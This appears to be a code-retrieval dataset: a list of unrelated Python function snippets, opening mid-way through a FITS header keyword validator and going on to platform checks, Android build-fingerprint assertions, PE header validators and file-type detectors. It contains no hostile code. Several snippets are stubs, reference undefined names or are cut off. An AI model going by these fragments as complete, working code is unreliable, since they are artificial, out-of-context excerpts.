'None_OK':True},\n 'A-DDEC': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'A-DDESTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PSF-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'PSF-V': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n 'PSF-RAD': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-RADP': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-SIZE': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'PSF-FRAC': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-SAMP': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-CFGS': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'PSF-NOBJ': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'PSF-FIX': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'PSF-PLDG': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PSF-CHI2': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PSF-FWHM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-SEE': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PSF-PMIN': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-PMAX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-PMED': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-PSTD': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-BMIN': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-BMAX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-BMED': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-BSTD': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMNM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMXM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMDM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-ESTM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMNM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMXM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMDM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FSTM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMNG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMXG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-EMDG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-ESTG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMNG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMXG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FMDG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PSF-FSTG': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PC-P': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'PC-CAT-F': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':True},\n 'PC-NCAL': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'PC-TNCAL': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-FNCAL': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-NCMAX': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-NCMIN': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-ZPFDG': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-ZPF0': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PC-TNSUB': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-NSUB': {'htype':'full', 'dtype':int, 'DB':False, 'None_OK':True},\n 'PC-MZPD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PC-MZPS': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PC-ZPDEF': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'PC-ZP': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PC-ZPSTD': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PC-EXTCO': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'AIRMASSC': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'RA-CNTR': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'DEC-CNTR': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'PC-AIRM': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'NSIGMA': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'LIMEFLUX': {'htype':'full', 'dtype':float, 'DB':False, 'None_OK':True},\n 'LIMMAG': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'NOBJECTS': {'htype':'full', 'dtype':int, 'DB':True, 'None_OK':True},\n 'RADECOFF': {'htype':'full', 'dtype':float, 'DB':True, 'None_OK':True},\n 'FORMAT-P': {'htype':'full', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'DUMCAT': {'htype':'full', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'QC-FLAG': {'htype':'full', 'dtype':str, 'DB':True, 'None_OK':False},\n 'DATEFILE': {'htype':'full', 'dtype':str, 'DB':False, 'None_OK':True},\n #\n # transient header\n 'SWARP-P': {'htype':'trans', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'SWARP-V': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'Z-REF': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'Z-DXYLOC': {'htype':'trans', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'Z-DX': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-DY': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-DXSTD': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-DYSTD': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-FNRLOC': {'htype':'trans', 'dtype':bool, 'DB':False, 'None_OK':True},\n 'Z-FNR': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-FNRSTD': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-P': {'htype':'trans', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'Z-V': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'Z-SIZE': {'htype':'trans', 'dtype':int, 'DB':False, 'None_OK':True},\n 'Z-BSIZE': {'htype':'trans', 'dtype':int, 'DB':False, 'None_OK':True},\n 'Z-SCMED': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-SCSTD': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'Z-FPEMED': {'htype':'trans', 'dtype':float, 'DB':False, 'None_OK':True},\n 'Z-FPESTD': {'htype':'trans', 'dtype':float, 'DB':False, 'None_OK':True},\n 'T-NSIGMA': {'htype':'trans', 'dtype':int, 'DB':True, 'None_OK':True},\n 'T-LFLUX': {'htype':'trans', 'dtype':float, 'DB':False, 'None_OK':True},\n 'T-NTRANS': {'htype':'trans', 'dtype':int, 'DB':True, 'None_OK':True},\n 'T-FTRANS': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-LMAG': {'htype':'trans', 'dtype':float, 'DB':True, 'None_OK':True},\n 'T-NFAKE': {'htype':'trans', 'dtype':int, 'DB':False, 'None_OK':True},\n 'T-FAKESN': {'htype':'trans', 'dtype':float, 'DB':False, 'None_OK':True},\n 'MC-P': {'htype':'trans', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'MC-V': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'MC-MODEL': {'htype':'trans', 'dtype':str, 'DB':False, 'None_OK':True},\n 'TDUMCAT': {'htype':'trans', 'dtype':bool, 'DB':True, 'None_OK':False},\n 'TQC-FLAG': {'htype':'trans', 'dtype':str, 'DB':True, 'None_OK':False},\n }\n\n # read header of filename\n if isfile (filename):\n header = read_hdulist (filename, get_data=False, get_header=True)\n else:\n # return success=False if it does not exist\n log.warning ('file {} does not exist; not able to verify its header'\n .format(filename))\n return False\n\n\n # force [htypes] to be a list\n htypes_list = list(htypes)\n\n # loop keys in dict_head\n for key in dict_head.keys():\n\n # only check keywords with htype matching the input [htypes]\n if dict_head[key]['htype'] not in htypes_list:\n continue\n\n # check that key is present in header\n if key in header:\n\n # provide warning if dtype not as expected and header\n # keyword value is not 'None'\n if (dict_head[key]['dtype'] != type(header[key]) and\n header[key] != 'None'):\n log.warning ('dtype of keyword {}: {} does not match the '\n 'expected dtype: {} in header of {}'\n .format(key, type(header[key]),\n dict_head[key]['dtype'], filename))\n\n # if key goes to DataBase and value is 'None' or None\n # while 'None_OK' is False, raise an exception\n if (dict_head[key]['DB'] and not dict_head[key]['None_OK'] and\n (header[key] is None or header[key] == 'None')):\n msg = ('DataBase keyword {} not allowed to have \\'None\\' or '\n 'None value in header of {}'.format(key, filename))\n log.error (msg)\n raise ValueError (msg)\n\n\n else:\n msg = 'keyword {} not present in header of {}'.format(key, filename)\n # if keyword will be ingested into the database, raise an exception\n if dict_head[key]['DB']:\n log.error (msg)\n raise KeyError (msg)\n\n else:\n log.warning (msg)\n\n\n return", "def is64bit(self):\n return platform.machine().endswith('64')", "def osarch_is_64_bit():\n return osarch_match(\"64-bit\")", "def longdouble_lte_float64():\n return np.longdouble(2**53) == np.longdouble(2**53) + 1", "def is64Bit(program: ghidra.program.model.listing.Program) -> bool:\n ...", "def is_64bit(self):\n return self.machine == 'x86_64'", "def isFloor(self, x, y):\n\t\treturn self.getValue(x, y) == self.floor_char", "def valid(self, nt_header):\n try:\n return (self.OriginalFirstThunk != 0 and\n self.OriginalFirstThunk < nt_header.OptionalHeader.SizeOfImage and\n self.FirstThunk != 0 and\n self.FirstThunk < nt_header.OptionalHeader.SizeOfImage and\n self.Name < nt_header.OptionalHeader.SizeOfImage)\n except obj.InvalidOffsetError:\n return False", "def use_long_headers(header_row, long_to_short_dict):\n col_matches = 0\n for value in header_row:\n if FieldCleaner.clean_string(value) in long_to_short_dict:\n col_matches += 1\n # if most of column headers are in the long format,\n # we'll treat the file as having long headers\n return col_matches > .5 * len(header_row)", "def AssertSomeThumbprint(self, *fp):\n if not fp:\n raise ValueError(\"must specify some thumbprints\")\n cmd = (' ||\\n '.join([('getprop(\"ro.build.thumbprint\") == \"%s\"') % i\n for i in fp]) +\n ' ||\\n abort(\"E%d: Package expects build thumbprint of %s; this '\n 'device has \" + getprop(\"ro.build.thumbprint\") + \".\");') % (\n common.ErrorCode.THUMBPRINT_MISMATCH, \" or \".join(fp))\n self.script.append(cmd)", "def has_image_data (ff_hdus_list, which_hdu=0):\n if (which_hdu == 0): # heuristic for Primary HDU\n if (ff_hdus_list[which_hdu].header.get('NAXIS') == 2):\n return True\n else:\n return False\n else: # it's an extension and so marked\n return ( (len(ff_hdus_list) > which_hdu) and\n (ff_hdus_list[which_hdu].header.get('XTENSION') == 'IMAGE') )", "def AssertFingerprintOrThumbprint(self, fp, tp):\n cmd = ('getprop(\"ro.build.fingerprint\") == \"{fp}\" ||\\n'\n ' getprop(\"ro.build.thumbprint\") == \"{tp}\" ||\\n'\n ' abort(\"Package expects build fingerprint of {fp} or '\n 'thumbprint of {tp}; this device has a fingerprint of \" '\n '+ getprop(\"ro.build.fingerprint\") + \" and a thumbprint of \" '\n '+ getprop(\"ro.build.thumbprint\") + \".\");').format(fp=fp, tp=tp)\n self.script.append(cmd)", "def disk_is_valid(dhandle):\n if is_64bits:\n return dhandle.value != c_uint64(0).value\n else:\n return dhandle.value != c_uint32(0).value", "def is_image_size_64(image):\n return image['height'] == 64 and image['width'] == 64", "def has_supported_header_hormat(cls, csv_reader):\n return csv_reader.fieldnames == cls.INGFormatHeader", "def _check_header_data(self, scan_data, min_rt=None, max_rt=None, ms_level=None, polarity=None):\n \n if min_rt is not None and scan_data['retention_time'] < min_rt:\n return False\n \n if max_rt is not None and scan_data['retention_time'] > max_rt:\n return False\n \n if ms_level is not None and scan_data['ms_level'] != ms_level:\n return False\n \n if polarity is not None and scan_data['polarity'] != polarity:\n return False\n \n return True", "def is_64bit():\n is64bit = sys.maxsize > 2 ** 32\n if sys.platform == \"cli\":\n is64bit = sys.executable.endswith(\"ipy64.exe\")\n return is64bit", "def is_rfft(obj):\n if not (hasattr(obj, 'nx') and hasattr(obj, 'dx') and hasattr(obj, 'ny')\n and hasattr(obj, 'dy') and hasattr(obj, 'fft')):\n return False\n\n return obj.fft.shape == (obj.nx, obj.ny / 2 + 1)", "def uniform_shift_check(optree):\n if isinstance(optree, (BitLogicLeftShift, BitLogicRightShift, BitArithmeticRightShift)):\n return uniform_vector_constant_check(optree.get_input(1)) \\\n or not optree.get_input(1).get_precision().is_vector_format()\n return False", "def is_header(fields):\n if len(fields) < 11:\n return None\n # Test a column which should usually be a number in data lines and never a number in header lines.\n try:\n float(fields[8])\n return False\n except ValueError:\n pass\n first_field = fields[0]\n # An explicitly commented line is a header.\n if first_field.startswith('#'):\n return True\n # The first field in a header is usually these two (and never these in data lines).\n if first_field.lower() == 'sample' or first_field.lower() == 'family':\n return True\n # Fallback 1: There should never be a number in a header line. If we find one, it's a data line.\n for field in fields:\n try:\n float(field)\n return False\n except ValueError:\n pass\n # Fallback 2: Just test whether any of the known labels is in the line.\n for label in LABELS:\n if label in fields:\n return True\n for label in LABELS:\n if label.lower() in fields:\n return True", "def valid(self, nt_header):\n try:\n return (self.AddressOfFunctions < nt_header.OptionalHeader.SizeOfImage and\n self.AddressOfNameOrdinals < nt_header.OptionalHeader.SizeOfImage and\n self.AddressOfNames < nt_header.OptionalHeader.SizeOfImage and\n self.NumberOfFunctions < 0x7FFF and\n self.NumberOfNames < 0x7FFF)\n except obj.InvalidOffsetError:\n return False", "def fp_eq(x: float, y: float) -> bool:\n return fabs(x-y) < 10**-12", "def from_win_64_hex(self):\n try:\n base10_microseconds = int(wh, 16) / 10\n dt_obj = self.epoch_1601 + timedelta(microseconds=base10_microseconds)\n self.in_windows_hex_64 = dt_obj.strftime('%Y-%m-%d %H:%M:%S.%f')\n except Exception as e:\n if not args.log:\n pass\n else:\n logging.error(str(type(e)) + \",\" + str(e))\n self.in_windows_hex_64 = False\n return self.in_windows_hex_64", "def fp_gt(x: float, y: float) -> bool:\n return not fp_eq(x, y) and x > y", "def isThumb(self):\r\n output = False\r\n ea = self.func_ea\r\n while ea < self.func_ea + self.getSize():\r\n size = idc.get_item_size(ea)\r\n if size == 2 and idc.isCode(idc.GetFlags(ea)):\r\n output = True\r\n break\r\n ea = ea + size\r\n return output", "def check_feature_screening(\n screening_percentile, mask_img, is_classification, verbose=0\n):\n f_test = f_classif if is_classification else f_regression\n\n if screening_percentile == 100 or screening_percentile is None:\n return None\n elif not (0.0 <= screening_percentile <= 100.0):\n raise ValueError(\n \"screening_percentile should be in the interval\"\n f\" [0, 100], got {screening_percentile:g}\"\n )\n else:\n # correct screening_percentile according to the volume of the data mask\n screening_percentile_ = _adjust_screening_percentile(\n screening_percentile, mask_img, verbose=verbose\n )\n\n return SelectPercentile(f_test, percentile=int(screening_percentile_))", "def test_CheckHeadroom_WithMke2fsOutput(self):\n input_dir = common.MakeTempDir()\n output_image = common.MakeTempFile(suffix='.img')\n command = ['mkuserimg_mke2fs.sh', input_dir, output_image, 'ext4',\n '/system', '409600', '-j', '0']\n ext4fs_output, exit_code = RunCommand(command)\n self.assertEqual(0, exit_code)\n\n prop_dict = {\n 'fs_type' : 'ext4',\n 'partition_headroom' : '40960',\n 'mount_point' : 'system',\n }\n self.assertTrue(CheckHeadroom(ext4fs_output, prop_dict))\n\n prop_dict = {\n 'fs_type' : 'ext4',\n 'partition_headroom' : '413696',\n 'mount_point' : 'system',\n }\n self.assertFalse(CheckHeadroom(ext4fs_output, prop_dict))\n\n common.Cleanup()", "def Check_AlphaScreen_GST_FHs(mol, detail=False, showSMILES=False):\n GST = Filter('AlphaScreen_GST_FHs',detail, showSMILES)\n GST.get_pattl()\n res = GST.scan(mol)\n return res", "def fp_lt(x: float, y: float) -> bool:\n return not fp_eq(x, y) and x < y", "def _row_or_col_is_header(s_count, v_count):\n if s_count == 1 and v_count == 1:\n return False\n else:\n return (s_count + 1) / (v_count + s_count + 1) >= 2. / 3.", "def AssertSomeFingerprint(self, *fp):\n if not fp:\n raise ValueError(\"must specify some fingerprints\")\n cmd = (' ||\\n '.join([('getprop(\"ro.build.fingerprint\") == \"%s\"') % i\n for i in fp]) +\n ' ||\\n abort(\"E%d: Package expects build fingerprint of %s; '\n 'this device has \" + getprop(\"ro.build.fingerprint\") + \".\");') % (\n common.ErrorCode.FINGERPRINT_MISMATCH, \" or \".join(fp))\n self.script.append(cmd)", "def check_bit_exactness(input_raw_file):\n (t1, f1) = interpolate(input_raw_file, 'cpu_nn_lena.dat', 'cpu', 1, 'nn', 8000, 4000)\n (t2, f2) = interpolate(input_raw_file, 'gpu_nn_lena.dat', 'gpu', 1, 'nn', 8000, 4000)\n (t3, f3) = interpolate(input_raw_file, 'cpu_bl_lena.dat', 'cpu', 1, 'bl', 8000, 4000)\n (t4, f4) = interpolate(input_raw_file, 'gpu_bl_lena.dat', 'gpu', 1, 'bl', 8000, 4000)\n\n if filecmp.cmp(f1, f2, shallow=True):\n print(\"NN interpolation on GPU is bit exact with CPU\")\n if filecmp.cmp(f3, f4, shallow=True):\n print(\"Bilinear interpolation on GPU is bit exact with CPU\")", "def Check_AlphaScreen_HIS_FHs(mol, detail=False, showSMILES=False):\n HIS = Filter('AlphaScreen_HIS_FHs', detail, showSMILES)\n HIS.get_pattl()\n res = HIS.scan(mol)\n return res", "def check_large_file(self, **kw):\n\n\tif not 'define_name' in kw:\n\t\tkw['define_name'] = 'HAVE_LARGEFILE'\n\tif not 'execute' in kw:\n\t\tkw['execute'] = True\n\n\tif not 'features' in kw:\n\t\tif self.env.CXX:\n\t\t\tkw['features'] = ['cxx', 'cxxprogram']\n\t\telse:\n\t\t\tkw['features'] = ['c', 'cprogram']\n\n\tkw['fragment'] = LARGE_FRAGMENT\n\tkw['msg'] = 'Checking for large file support'\n\ttry:\n\t\tself.check(**kw)\n\texcept self.errors.ConfigurationError:\n\t\tpass\n\telse:\n\t\treturn True\n\n\tkw['msg'] = 'Checking for -D_FILE_OFFSET_BITS=64'\n\tkw['defines'] = ['_FILE_OFFSET_BITS=64']\n\ttry:\n\t\tself.check(**kw)\n\texcept self.errors.ConfigurationError:\n\t\tpass\n\telse:\n\t\tself.define('_FILE_OFFSET_BITS', 64)\n\t\treturn True\n\n\tself.fatal('There is no support for large files')", "def has_catalog_data (ff_hdus_list, which_hdu=1):\n if (which_hdu == 0): # not allowed? FITS 4.0: 3.3.2\n return False\n else: # it's an extension and so marked\n return ( (len(ff_hdus_list) > which_hdu) and\n (ff_hdus_list[which_hdu].header.get('XTENSION') in ['BINTABLE', 'TABLE']) )", "def isScreen(fmt):\n if fmt == 'CONS' or fmt == 'XWIN' or fmt =='XWLi':\n return 1\n return 0", "def check_ftype(cmd_args):\n if (cmd_args.period == 99 and cmd_args.f_type == 'grib'):\n return False\n else:\n return True", "def is_DIP(target):\n # logging.info(\"Calling is_DIP on %s\" % target)\n try:\n with open(target, 'rb') as f:\n file_header = f.read(7)\n return file_header == DIP_HEADER\n except IOError:\n return False\n except FileNotFoundError:\n return False", "def dnr_check(self, header):\n try:\n return self.locate.dnr_check(header)\n except Exception:\n return False", "def is_pointer(_format):\n return isinstance(_format, ML_Pointer_Format)", "def is_dbl_supported(device=None):\n dev = device if device is not None else get_device()\n res = ct.c_bool(False)\n safe_call(backend.get().af_get_dbl_support(ct.pointer(res), dev))\n return res.value", "def validate_log_entry(self):\n if (self.size() <= LOG_ENTRY_SIZE_HEADER) or (self.size() % LOG_ENTRY_SIZE_ALIGNMENT != 0):\n return False\n\n if self.hbins_size() % 0x1000 != 0:\n return False\n\n if self.hash_2() != self.calculate_hash_2() or self.hash_1() != self.calculate_hash_1():\n return False\n\n return True", "def is_type_correct(*args):\n return _ida_hexrays.is_type_correct(*args)", "def _has_numeric_strict(self) -> bool:\n return bool({'i', 'f'} & self._data.keys())", "def has_hash(self, h):\n rsp = h.hashlist(self.path)\n if re.search(\"\\n[0-9a-f]+\\smd5\\s%s\" % self.path, rsp):\n rval = True\n else:\n rval = False\n return rval", "def is_p4d_printable(c):\n if ord(c) < 0x20:\n return False\n if ord(c) == 0x7F:\n return False\n return True", "def is_splitted(self):\n\t\treturn bool(call_sdk_function('PrlVmDevHd_IsSplitted', self.handle))", "def __flt_eq_blh(self, other):\n if self.blush is None:\n return True\n\n return self.blush == other.blush", "def is_distance(x, y):\n assert (x.dtype == np.float64 and y.dtype == np.float64) or (\n x.dtype == np.float32 and y.dtype == np.float32)\n\n # TODO\n raise NotImplementedError", "def include_hxl_row(dv_columns, hxl_columns):\n return bool(set(hxl_columns).intersection(set(dv_columns)))", "def isFissile(self):\n raise NotImplementedError", "def check_rmap_relevance(self, header):\n try:\n source, compiled = self._rmap_relevance_expr\n relevant = eval(compiled, {}, header) # secured\n log.verbose(\"Filekind \", repr(self.instrument), repr(self.filekind),\n \"is relevant:\", relevant, repr(source), verbosity=55)\n except Exception as exc:\n log.warning(\"Failed checking relevance for\", repr(self.instrument),\n repr(self.filekind), \"with expr\", repr(source),\n \":\", str(exc))\n else:\n if not relevant:\n raise crexc.IrrelevantReferenceTypeError(\n \"Rmap does not apply to the given parameter set based on rmap_relevance expression.\")", "def pixeldq_propagation(output_hdul, reference_hdul, input_hdul):\n nframes = output_hdul[0].header['NFRAMES']\n groupgap = output_hdul[0].header['GROUPGAP']\n nints, ngroups, nx, ny = output_hdul['SCI'].shape\n nframes_tot = (nframes+groupgap)*ngroups\n if nframes_tot > reference_hdul['SCI'].data.shape[0]:\n result = np.all(input_hdul['PIXELDQ'].data == output_hdul['PIXELDQ'].data)\n return result\n\n else:\n result = np.all(core_utils.bitwise_propagate(reference_hdul, input_hdul['PIXELDQ'].data) == output_hdul['PIXELDQ'].data)\n return result", "def osarch_is_32_bit():\n return osarch_match(\"32-bit\")", "def is_header(line, max_level):\n if max_level:\n return len(re.findall(\"^#{{1,{0}}} .+\".format(max_level), line)) > 0\n else:\n return len(re.findall(\"^#+ .+\", line)) > 0", "def is_fits_file (fyl):\n return (fnmatch.fnmatch(fyl, _FITS_PAT) or fnmatch.fnmatch(fyl, _GZFITS_PAT))", "def checkfile(filename, source=None):\n if source:\n # Let's check some sums\n if os.path.exists(filename) and os.path.exists(source):\n src_sha = calchash(source)\n dest_sha = calchash(filename)\n if DRYRUN:\n print(\"{src} hash {src_sha}. {dest} hash {dest_sha}\".format(src=source, dest=filename, src_sha=src_sha.hexdigest(), dest_sha=dest_sha.hexdigest()))\n return src_sha.digest() == dest_sha.digest()\n else:\n return os.path.exists(filename)", "def longdouble_precision_improved():\n return not longdouble_lte_float64() and _LD_LTE_FLOAT64", "def is_raw_hmeta_key(term: str) -> bool:\n\n # The minimal viable term is '([ZZZ])', We do some quick checks\n if term is None or len(term) < 7:\n return False\n\n if not term.startswith('(') or not term.endswith(')') or \\\n term.index('[') == -1 or term.index(']') == -1:\n return False\n\n # TODO: the has_hsilo_syntax is doing a very basic check. Some\n # responsability will be passed for check later, like actually\n # compare to an know language. But we could at least check\n # here for wrong number of open and closed () [].\n\n return True", "def is_64_windows():\n return 'PROGRAMFILES(X86)' in os.environ", "def is_double_scalar_reg(register):\n if register in [ProcessorRegister.double_scalar_0,\n ProcessorRegister.double_scalar_1]:\n return True\n else:\n return False", "def is_passing(hi_sens, hi_prec, purity, min_sensitivity, min_precision, min_supported_purity):\n # type: (float, float, float, float, float, float) -> bool\n if purity < min_supported_purity:\n return True\n if hi_sens < min_sensitivity:\n return False\n if hi_prec < min_precision:\n return False\n return True", "def safe_check(dicts, kernel_name):\n x_shape = dicts[0].get(\"shape\")\n x_dtype = dicts[0].get(\"dtype\").lower()\n rois_shape = dicts[1].get(\"shape\")\n rois_dtype = dicts[1].get(\"dtype\").lower()\n\n y_dtype = dicts[3].get(\"dtype\").lower()\n y_shape = dicts[3].get(\"shape\")\n\n profile = tik.Dprofile()\n tik_name_check = tbe_platform.cce_conf.get_soc_spec(\"SOC_VERSION\")\n if tik_name_check in (\"Ascend310\", \"Ascend910\", \"Hi3796CV300ES\", \"Hi3796CV300CS\"):\n util.check_dtype_rule(x_dtype, (\"float16\",))\n util.check_dtype_rule(rois_dtype, (\"float16\",))\n else:\n util.check_dtype_rule(x_dtype, (\"float16\", \"float32\"))\n util.check_dtype_rule(rois_dtype, (\"float16\", \"float32\"))\n\n if x_dtype != rois_dtype or x_dtype != y_dtype:\n raise RuntimeError(\"dtype in x, rois and y must be equal\")\n\n util.check_shape_rule(x_shape, min_dim=5, max_dim=5)\n util.check_tensor_shape_size(x_shape)\n util.check_shape_rule(rois_shape, min_dim=3, max_dim=3)\n util.check_tensor_shape_size(rois_shape)\n util.check_shape_rule(y_shape, min_dim=5, max_dim=5)\n util.check_tensor_shape_size(y_shape)\n\n roi_max_num = rois_shape[2]\n if roi_max_num > 6000 or roi_max_num % 16 != 0:\n raise ValueError(\"the dim 2 of rois_shape is illegal\")\n\n util.check_kernel_name(kernel_name)", "def Check_AlphaScreen_FHs(mol, detail=False, showSMILES=False):\n AlphaScreen = Filter('AlphaScreen_FHs',detail, showSMILES)\n AlphaScreen.get_pattl()\n res = AlphaScreen.scan(mol)\n return res", "def to_win_64_hex(self):\n ts_type = self.ts_types['windows_hex_64']\n try:\n dt_obj = duparser.parse(self.timestamp)\n if hasattr(dt_obj.tzinfo, '_offset'):\n dt_tz = dt_obj.tzinfo._offset.total_seconds()\n dt_obj = duparser.parse(self.timestamp, ignoretz=True)\n else:\n dt_tz = 0\n minus_epoch = dt_obj - self.epoch_1601\n calculated_time = minus_epoch.microseconds + ((minus_epoch.seconds - int(dt_tz)) * 1000000) + (minus_epoch.days * 86400000000)\n self.out_windows_hex_64 = str(hex(int(calculated_time)*10))[2:].zfill(16)\n ts_output = str(\"{}\\t\\t{}\".format(ts_type, self.out_windows_hex_64))\n except Exception:\n exc_type, exc_obj, exc_tb = sys.exc_info()\n print(str(exc_type) + \" - \" + str(exc_obj) + \" - line \" + str(exc_tb.tb_lineno))\n self.out_windows_hex_64 = ts_output = False\n return self.out_windows_hex_64, ts_output", "def sanity_check(left_line, right_line):\n\n # check horizontal separation distance\n if abs(right_line.line_base_pos - left_line.line_base_pos) > 4.0:\n #print(\"Line base positions too far from each other\")\n return False\n\n # check lines are roughly parallel\n # if base pos and raduius of both lines are ok, it should be enough\n # to check the X distances of a few points with respect to their y positions\n # so slice the Y points into chunks and check\n chunksize = 200\n length = min(len(left_line.ally), len(right_line.ally))\n\n # TODO: error handling\n if (right_line.allx is not None) and (left_line.allx is not None):\n bias = None\n for i in range(0, length, chunksize):\n\n # take x at car as bias\n if bias is None:\n bias = abs(right_line.allx[i] - left_line.allx[i]) * left_line.xm_per_pix\n else:\n if abs(bias - abs(right_line.allx[i] - left_line.allx[i])*left_line.xm_per_pix) > 1.0:\n #print(\"Lines are not parallel\")\n return False\n else:\n return False\n\n # check curvatures -- the curvatures for left and right should be roughly\n # in the same magitude -- check for error\n if abs(left_line.radius_of_curvature - right_line.radius_of_curvature) > 200:\n #print(\"Line radius of curvature too different\")\n return False\n\n return True", "def check(header, out):\r\n for i in range(len(header)):\r\n if header[i] > 0:\r\n if header[i] != int(out[i]):\r\n return False\r\n return True", "def checkendsilence(inputgiven):\n output = getlastslice(inputgiven)\n wave_file = wave.open(output, \"r\")\n for i in range(wave_file.getnframes()):\n current_frame = wave_file.readframes(1)\n unpacked_signed_value = struct.unpack(\"<h\", current_frame)\n if abs(unpacked_signed_value[0]) > 500:\n return False\n return True", "def check_boundary(self, width, height):\r\n if 0 <= self.head[0] + self.direction[0]*10 <= width - 10 and 0 <= self.head[1] + self.direction[1]*10 <= height - 10:\r\n return True\r\n else:\r\n return False", "def should_i_even_bother(file_bytes):\n if file_bytes[E_MAG[0]:E_MAG[1]] == (str(0x7f) + \"ELF\"):\n if file_bytes[E_BIT[0]] == 1:\n if file_bytes[E_END[0]] == 1:\n return True #this is a 32-bit little-endian ELF file\n return False #this is not a 32-bit little-endian ELF file", "def _is_truncated(self) -> bool:\n raise NotImplementedError", "def payload_is_handleable(self, payload):\n\t\tif payload.get_filename():\n\t\t\treturn True\n\t\treturn False", "def is_raw_hdp_item_syntax(thing: dict) -> bool:\n\n hcor = get_raw_hcor(thing)\n hmeta = get_raw_hmeta(thing)\n\n return (hmeta is not None) and (hcor is not None)", "def compare_vendor_price_list_detail_dial_digits_grid_destination(self):\n 